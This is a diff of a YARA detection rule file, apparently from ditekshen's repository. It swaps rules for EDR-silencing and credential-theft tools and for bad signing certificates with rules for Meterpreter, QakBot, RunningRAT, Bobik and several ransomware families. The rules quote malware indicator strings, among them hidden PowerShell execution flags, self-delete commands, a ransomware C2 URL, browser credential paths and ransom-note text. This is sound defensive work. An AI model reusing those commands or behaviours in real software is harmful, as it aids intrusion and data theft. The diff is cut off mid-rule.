-		$s2 = "blockedr" fullword ascii
-		$s3 = "edrProcess" fullword ascii
-		$s4 = "BlockEdrProcessTraffic" fullword ascii
-		$s5 = "isInEdrProcessList" fullword ascii
-		$s6 = "EDRSilencer.c" fullword ascii
-		$v1 = "elastic-agent.exe" fullword ascii nocase
-		$v2 = "CybereasonAV.exe" fullword ascii nocase
-		$v3 = "SentinelAgent.exe" fullword ascii nocase
-		$v4 = "fortiedr.exe" fullword ascii nocase
-		$v5 = "MsMpEng.exe" fullword ascii nocase
-		$v6 = "CylanceSvc.exe" fullword ascii nocase
+		$s1 = "[Clipboard End]" fullword wide
+		$s2 = "[Ctrl +" fullword wide
+		$s3 = "[Alt +" fullword wide
+		$s4 = "Clipboard Start" wide
+		$s5 = "(Wscript.ScriptFullName)" wide
+		$s6 = "CSDVersion" fullword ascii
+		$s7 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" fullword ascii
+		$x1 = { 2e 65 78 65 00 00 84 00 00 4d 5a 90 00 }
+		$x2 = "This program cannot be run in DOS mode" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $v* ) ) )
+		(( uint16( 0 ) == 0x5a4d and all of ( $s* ) ) or all of them )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Edrprison : FILE
+rule DITEKSHEN_MALWARE_Win_Meterpreter : FILE
 {
 	meta:
-		description = "Detects EDRPrison"
-		author = "ditekshen"
-		id = "85831265-fd9e-5e0e-b5d9-22bf1c89b3f2"
+		description = "Detects Meterpreter payload"
+		author = "ditekSHen"
+		id = "d72fef80-d624-5e39-963a-8d7c12eb2d9c"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1859-L1872"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3330-L3343"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e1ef9e9c6bd0d2efa7b0b617fb52100075658221559f92a61c672807ab5a4d77"
+		logic_hash = "5226cd7bb2344b822ee94d75f81a523ff701778de97a32ae52c604a4855e960c"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Block:" wide
-		$s2 = "PacketLen:" wide
-		$s3 = "DoWorkPacket_Step" ascii
-		$s4 = "DoWorkAsyncNETWORK" ascii
-		$s5 = "BlockMessage" ascii
-		$s6 = "GetRmAddrPortNetwork" ascii
+		$s1 = "PACKET TRANSMIT" fullword ascii
+		$s2 = "PACKET RECEIVE" fullword ascii
+		$s3 = "\\\\%s\\pipe\\%s" fullword ascii wide
+		$s4 = "%04x-%04x:%s" fullword wide
+		$s5 = "server.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		( uint16( 0 ) == 0x5a4d and all of them ) or ( filesize < 300KB and all of them )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Sharpsqlpwn : FILE
+rule DITEKSHEN_MALWARE_Win_Trojan_Expresscms : FILE
 {
 	meta:
-		description = "Detects SharpSQLPwn"
-		author = "ditekshen"
-		id = "f99c0ddb-a073-5c15-9a7c-60f6766cd0a2"
+		description = "Detects ExpressCMS"
+		author = "ditekSHen"
+		id = "d096db0c-05f6-5b69-9d84-0105f2182ff3"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1874-L1891"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3366-L3382"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c811d4926c433c6521f4bbe03a1abf4a5b27b56931a18a8bb672f37fe4fccfb8"
+		logic_hash = "64d551e0c11b6394f9ae2b8fa749c36cb1b5c3f498592f95dc19fdea23c53160"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.ExpressCMS"
 
 	strings:
-		$s1 = "smb_ip" fullword ascii
-		$s2 = "Recon" fullword ascii
-		$s3 = "UNCPathInjection" fullword ascii
-		$s4 = "from sys.server_principals" wide
-		$s5 = "EXEC sp_configure '" wide
-		$s6 = "EXEC ('sp_configure" wide
-		$s7 = "CREATE ASSEMBLY" wide
-		$s8 = "DROP ASSEMBLY" wide
-		$s9 = "FROM 0x" wide
-		$s10 = "EXEC master..xp_dirtree \"\\\\" wide
+		$s1 = "/click.php?cnv_id=" fullword wide
+		$s2 = "/click.php?key=" wide
+		$s3 = "jdlnb" fullword wide
+		$s4 = "Gkjfdshfkjjd: dsdjdsjdhv" fullword wide
+		$s5 = "--elevated" fullword wide
+		$s6 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\%d" wide
+		$s7 = "\\Microsoft\\Manager.exe" fullword wide
+		$s8 = "\\Microsoft\\svchost.exe" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Chromekatz : FILE
+rule DITEKSHEN_MALWARE_Win_Meterpreterstager : FILE
 {
 	meta:
-		description = "Detects ChromeKatz: CookieKatz and CredentialKatz"
-		author = "ditekshen"
-		id = "9dd706c8-552c-5c96-9b81-cfd50157ac34"
+		description = "Detects Meterpreter stager payload"
+		author = "ditekSHen"
+		id = "dfbc37e9-13e0-55e2-a501-1005eea52b63"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1893-L1908"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3384-L3395"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4f1bdbb7f8c4893444baac287c8fcefaca80a4301845706b56e9f9628c9f116f"
+		logic_hash = "0ac53a10abb1e4dd7da57872cd1779851d953127a912c31a5e411d8eb9bd07f4"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "\\include\\xmemory" ascii wide
-		$s2 = "targetBrowser" ascii
-		$s3 = "thirdPattern" ascii
-		$s4 = "isBrowserWow64" ascii
-		$s5 = "wcscpy_s(memory, size_in_elements, string)" fullword wide
-		$s6 = "hChrome" fullword ascii
-		$t1 = "szCookieMonster" fullword ascii
-		$t2 = "szPasswordReuseDetectorInstances" fullword ascii
+		$s1 = "PAYLOAD:" fullword ascii
+		$s2 = "AQAPRQVH1" fullword ascii
+		$s3 = "ws2_32" fullword ascii
+		$s4 = "KERNEL32.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and all of them and filesize < 100KB
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_56203Db039Adbd6094B6A142C5E50587 : FILE
+rule DITEKSHEN_MALWARE_Win_Ziggy : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Ziggy ransomware"
 		author = "ditekSHen"
-		id = "b3e56f78-e79a-52e3-b29e-1f566946609e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "6d2d316a-cf19-5001-bf94-842346229d76"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3-L14"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3397-L3421"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "38380bc1a22b8d0fe851f76d2ecadba638f10b01873be44766124fb738e23d71"
+		logic_hash = "103a50511971161ca673e0c8378aeca2fa7d0f6309966bbb2b70e0d039e0f196"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e438c77483ecab0ff55cc31f2fd2f835958fad80"
-		importance = 20
+		snort2_sid = "920098"
+		snort3_sid = "920096"
+		clamav_sig = "MALWARE.Win.Ransomware.Ziggy"
+
+	strings:
+		$id1 = "/Ziggy Info;component/mainwindow.xaml" fullword wide
+		$id2 = "AZiggy Info, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" fullword ascii
+		$id3 = "Ziggy Ransomware" fullword wide
+		$id4 = "clr-namespace:Zeggy" fullword ascii
+		$s1 = "GetCooldown" fullword ascii
+		$s2 = "checkCommandMappings" fullword ascii
+		$s3 = "add_OnExecuteCommand" fullword ascii
+		$s4 = "MindLated.jpg" fullword wide
+		$s5 = "http://fixfiles.xyz/ziggy/api/info.php?id=" fullword wide
+		$s6 = "Reamaining time:" fullword wide
+		$msg1 = "<:In case of no answer in 12 hours write us to this e-mail" ascii
+		$msg2 = "Free decryption as guarantee" fullword ascii
+		$msg3 = "# Do not try to decrypt your data using third party software, it may cause permanent data loss" ascii
+		$msg4 = "# Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can becom" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bccabdacabbdcda" and pe.signatures [ i ] . serial == "56:20:3d:b0:39:ad:bd:60:94:b6:a1:42:c5:e5:05:87" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $id* ) or 4 of ( $s* ) or 3 of ( $msg* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_B5F34B7C326C73C392B515Eb4C2Ec80E : FILE
+rule DITEKSHEN_MALWARE_Win_Nworm : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects NWorm/N-W0rm payload"
 		author = "ditekSHen"
-		id = "f5d19333-4aee-52d3-aeac-822b39ec653a"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "06546ccf-8914-5b1c-942f-99664b9ecf44"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L16-L27"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3423-L3443"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "553ef777cb7a93934caa53cc9acdc37fc4cbe2a28ae320f4a7f10b2a4073d675"
+		logic_hash = "a1397a057422be260b5bdf1eb58571e95c259c132cc2518b39e1524a0eda9c66"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9d35805d6311fd2fe6c49427f55f0b4e2836bbc5"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.NWorm"
+
+	strings:
+		$id1 = "N-W0rm" ascii
+		$id2 = "N_W0rm" ascii
+		$x1 = "pongPing" fullword wide
+		$x2 = "|NW|" fullword wide
+		$s1 = "runFile" fullword wide
+		$s2 = "runUrl" fullword wide
+		$s3 = "killer" fullword wide
+		$s4 = "powershell" fullword wide
+		$s5 = "wscript.exe" fullword wide
+		$s6 = "ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -File \"" fullword wide
+		$s7 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36" fullword wide
+		$s8 = "Start-Sleep -Seconds 1.5; Remove-Item -Path '" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cdaadbffbaedaabbdedfdbfebf" and pe.signatures [ i ] . serial == "b5:f3:4b:7c:32:6c:73:c3:92:b5:15:eb:4c:2e:c8:0e" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $id* ) and ( 1 of ( $x* ) or 3 of ( $s* ) ) ) or ( all of ( $x* ) and 2 of ( $s* ) ) or 7 of ( $s* ) or 10 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0A1Dc99E4D5264C45A5090F93242A30A : FILE
+rule DITEKSHEN_MALWARE_Win_Qakbot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects variants of QakBot payload"
 		author = "ditekSHen"
-		id = "8efea9da-a3ae-5af3-83b2-cac5baa4fa89"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "3a3b3b6c-0969-584e-a184-7acfca3cdd42"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L29-L40"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3445-L3457"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cb230503e17e93f78b04723c32d7ce66bdf146846e0208d268eebc0e446a6917"
+		logic_hash = "b64c05eb7ac03b2b4709f9979d117e4cacc617f21d0b3bf1c1be42aa18cc44cc"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "17680b1ebaa74f94272957da11e914a3a545f16f"
-		importance = 20
+
+	strings:
+		$s1 = "stager_1.dll" fullword ascii
+		$s2 = "_vsnwprintf" fullword ascii
+		$s3 = "DllRegisterServer" fullword ascii
+		$s4 = "Win32_PnPEntity" fullword wide
+		$s5 = "0>user32.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "K & D KOMPANI d.o.o." and pe.signatures [ i ] . serial == "0a:1d:c9:9e:4d:52:64:c4:5a:50:90:f9:32:42:a3:0a" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0D53690631Dd186C56Be9026Eb931Ae2 : FILE
+rule DITEKSHEN_MALWARE_Win_Fonix : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Fonix ransomware"
 		author = "ditekSHen"
-		id = "f0afbdf4-68db-522f-95d7-cd76aa7b9710"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "d67cce49-5f4f-59f6-b2a9-9c4dd1c6c0f6"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L42-L53"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3459-L3481"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "645c2340fe7e7ce992f3f655d5058834d0df6a64ea20ef7794893a592124c55e"
+		logic_hash = "159b8946f7772c76271de821eb12897689bf73d96fc6a1d7c4a65cdc50b877c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c5d1e46a40a8200587d067814adf0bbfa09780f5"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Ransomware.Fonix"
+
+	strings:
+		$s1 = "dontcryptanyway" fullword wide
+		$s2 = "Cpriv.key" ascii wide
+		$s3 = "Cpub.key" ascii wide
+		$s4 = "NetShareEnum() failed!Error: % ld" fullword wide
+		$s5 = "<div class='title'> Attention!</div><ul><li><u><b>DO NOT</b> pay" wide
+		$s6 = "Encryption Completed !!!" fullword wide
+		$s7 = "kill process" fullword ascii
+		$s8 = "Copy SystemID C:\\ProgramData\\SystemID" ascii
+		$id1 = "].FONIX" fullword wide
+		$id2 = "xinofconfig.txt" fullword ascii wide
+		$id3 = "XINOF4MUTEX" wide
+		$id4 = ":\\Fonix\\cryptoPP\\" ascii
+		$id5 = "schtasks /CREATE /SC ONLOGON /TN fonix" ascii
+		$id6 = "Ransomware\\Fonix" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STA-R TOV" and pe.signatures [ i ] . serial == "0d:53:69:06:31:dd:18:6c:56:be:90:26:eb:93:1a:e2" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 3 of ( $id* ) or ( 1 of ( $id* ) and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Fd8C468Cc1B45C9Cfb41Cbd8C835Cc9E : FILE
+rule DITEKSHEN_MALWARE_Win_Bobik : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Bobik infostealer"
 		author = "ditekSHen"
-		id = "836af706-3a82-5aaf-9a96-244eef5820b2"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "12f14151-0c89-519d-85d3-4b4b82a950a3"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L55-L66"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3483-L3498"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "495ec6dbfdec3f608e387280e2d34093bb4965f5ada7c101e3119ae970eaf80d"
+		logic_hash = "735dcb9e04956863305ca89a43686b8e48e3b20784ae9292cfc40d1c2c09d467"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "08fc56a14dcdc9e67b9a890b65064b8279176057"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.Bobik"
+
+	strings:
+		$s1 = "@Default\\Login Data" fullword ascii
+		$s2 = "@Default\\Cookies" fullword ascii
+		$s3 = "@logins.json" fullword ascii
+		$s4 = "@[EXECUTE]" fullword ascii
+		$s5 = "@C:\\Windows\\System32\\cmd.exe" fullword ascii
+		$s6 = /(CHROME|OPERA|FIREFOX)_BASED/ fullword ascii
+		$s7 = "threads.nim" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Pivo ZLoun s.r.o." and pe.signatures [ i ] . serial == "fd:8c:46:8c:c1:b4:5c:9c:fb:41:cb:d8:c8:35:cc:9e" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_32Fbf8Cfa43Dca3F85Efabe96Dfefa49 : FILE
+rule DITEKSHEN_MALWARE_Win_Runningrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects RunningRAT"
 		author = "ditekSHen"
-		id = "9a228e0e-256b-547d-af6d-960089f2f803"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "161faa8c-614e-5102-bb6d-c1ed4abf8274"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L68-L79"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3500-L3536"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7e53dcd2e10285f710f1fb2355d77db3507ce346e8d0f26843ca8df2271a6e9e"
+		logic_hash = "e3cddec792ad95d823190f12970b8e0515b73be4a91f89cbb2bbde2fa1cfde63"
 		score = 75
-		quality = 75
+		quality = 23
 		tags = "FILE"
-		thumbprint = "498d63bf095195828780dba7b985b71ab08e164f"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.RunningRAT"
+
+	strings:
+		$s1 = "%s%d.dll" fullword ascii
+		$s2 = "/c ping 127.0.0.1 -n" ascii
+		$s3 = "del /f/q \"%s\"" ascii
+		$s4 = "GUpdate" fullword ascii
+		$s5 = "%s\\%d.bak" fullword ascii
+		$s6 = "\"%s\",MainThread" ascii
+		$s7 = "rundll32.exe" fullword ascii
+		$rev1 = "emankcosteg" fullword ascii
+		$rev2 = "ini.revreS\\" fullword ascii
+		$rev3 = "daerhTniaM,\"s%\" s%" ascii
+		$rev4 = "s% etadpUllD,\"s%\" 23lldnuR" ascii
+		$rev5 = "---DNE yromeMmorFdaoL" fullword ascii
+		$rev6 = "eMnigulP" fullword ascii
+		$rev7 = "exe.23lldnuR\\" fullword ascii
+		$rev8 = "dnammoc\\nepo\\llehs\\" ascii
+		$rev9 = "\"s%\" k- exe.tsohcvs\\23metsyS\\%%tooRmetsyS%" ascii
+		$rev10 = "emanybtsohteg" fullword ascii
+		$rev11 = "tekcosesolc" fullword ascii
+		$rev12 = "tpokcostes" fullword ascii
+		$rev13 = "emantsohteg" fullword ascii
+		$v2_1 = "%%SystemRoot%%\\System32\\svchost.exe -k \"%s\"" fullword ascii
+		$v2_2 = "LoadFromMemory END---" fullword ascii
+		$v2_3 = "hmProxy!= NULL" fullword ascii
+		$v2_4 = "Rundll32 \"%s\",DllUpdate %s" fullword ascii
+		$v2_5 = "ipip.website" fullword ascii
+		$v2_6 = "%d*%sMHz" fullword ascii
+		$v2_7 = "\\Server.ini" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Foxstyle LLC" and pe.signatures [ i ] . serial == "32:fb:f8:cf:a4:3d:ca:3f:85:ef:ab:e9:6d:fe:fa:49" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 5 of ( $rev* ) or 6 of ( $v* ) or 8 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_7E0Ccda0Ef37Acef6C2Ebe4538627E5C : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent05 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects an unknown dropper. Typically exisys as a DLL in base64-encoded gzip-compressed file embedded within another executable"
 		author = "ditekSHen"
-		id = "89006ac2-5cbc-5e7f-9ca6-51316b8d4bfd"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "a8a72484-42be-5c5c-962b-75bed8acdf39"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L81-L92"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3538-L3551"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "aed6c65f9c6400c0cc94386be684d3b9dd8d7637f9798fb49f4f651cf28b2d12"
+		logic_hash = "e8c7c03451bbfcba7a1ab02f8c1320ad50d17d2e990f0e2f89942faea2a1e531"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a758d6799e218dd66261dc5e2e21791cbcccd6cb"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.DLAgent05"
+
+	strings:
+		$s1 = "MARCUS.dll" fullword ascii wide
+		$s2 = "GZipStream" fullword ascii
+		$s3 = "MemoryStream" fullword ascii
+		$s4 = "proj_name" fullword ascii
+		$s5 = "res_name" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Orangetree B.V." and pe.signatures [ i ] . serial == "7e:0c:cd:a0:ef:37:ac:ef:6c:2e:be:45:38:62:7e:5c" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0095E5793F2Abe0B4Ec9Be54Fd24F76Ae5 : FILE
+rule DITEKSHEN_MALWARE_Win_Nemty : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects Nemty/Nefilim ransomware"
 		author = "ditekSHen"
-		id = "94878b56-5b29-55a8-a8ec-7ace588e34ef"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "361269c6-5215-5ecf-869c-3c55ff8387e1"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L94-L105"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3553-L3577"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b1f8867b47c1bec43b3603af343d6d5728ec218a66863a6777c0ee59ae1faa98"
+		logic_hash = "dcebcddc472f4fb3bb34c35fc5a5424e54bfc3a262fdae10b189d210217b9b37"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6acdfee2a1ab425b7927d0ffe6afc38c794f1240"
-		importance = 20
+
+	strings:
+		$s1 = "Go build ID:" ascii
+		$s2 = "GOMAXPROCSGetIfEntryGetVersionGlagoliticKharoshthiManichaeanOld_ItalicOld_PermicOld_TurkicOther_MathPOSTALCODEPhoenicianSaurasht" ascii
+		$s3 = "crypto/x509.ExtKeyUsage" ascii
+		$s4 = "crypto/x509.KeyUsageContentCommitment" ascii
+		$s5 = "DEK-Info header" ascii
+		$s6 = "GetUserProfileDirectoryWMagallanes Standard TimeMontevideo Standard TimeNorth Asia Standard TimePacific SA Standard TimeQueryPerformanceCounter" fullword ascii
+		$s7 = "*( -  <  =  >  k= m=%: +00+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12..." ascii
+		$s8 = "Go cmd/compile go1.10" fullword ascii
+		$s9 = ".dllprogramdatarecycle.bin" ascii
+		$s10 = ".dll.exe.lnk.sys.url" ascii
+		$vx1_1 = "Fa1led to os.OpenFile()" ascii
+		$vx1_2 = "-HELP.txt" ascii
+		$vf1_1 = "main.CTREncrypt" fullword ascii
+		$vf1_2 = "main.FileSearch" fullword ascii
+		$vf1_3 = "main.getdrives" fullword ascii
+		$vf1_4 = "main.RSAEncrypt" fullword ascii
+		$vf1_5 = "main.SaveNote" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kommservice LLC" and pe.signatures [ i ] . serial == "00:95:e5:79:3f:2a:be:0b:4e:c9:be:54:fd:24:f7:6a:e5" )
+		uint16( 0 ) == 0x5a4d and ( 9 of ( $s* ) or ( all of ( $vx* ) and 2 of ( $s* ) ) or all of ( $vf* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00C167F04B338B1E8747B92C2197403C43 : FILE
+rule DITEKSHEN_MALWARE_Win_Qnapcrypt : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects QnapCrypt/Lockedv1/Cryptfile2 ransomware"
 		author = "ditekSHen"
-		id = "d838e09b-e2f2-585a-a33d-bfe34f989e77"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "3ef5643a-f2af-5d62-8927-e46679e069c2"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L107-L118"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3579-L3607"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "008fe748c7956c1885c7d7e3a843d2310c17b7552dbbe9b4750809a5642d7ca6"
+		logic_hash = "68fc3f0503d82295ffa5bfb49bda8b790142913217775a2812e3965a6c9a1fe1"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "7af7df92fa78df96d83b3c0fd9bee884740572f9"
-		importance = 20
+
+	strings:
+		$go = "Go build ID:" ascii
+		$s1 = "Encrypting %s..." ascii
+		$s2 = "\\Start Menu\\Programs\\StartUp\\READMEV" ascii
+		$s3 = "main.deleteRecycleBin" ascii
+		$s4 = "main.encryptFiles" ascii
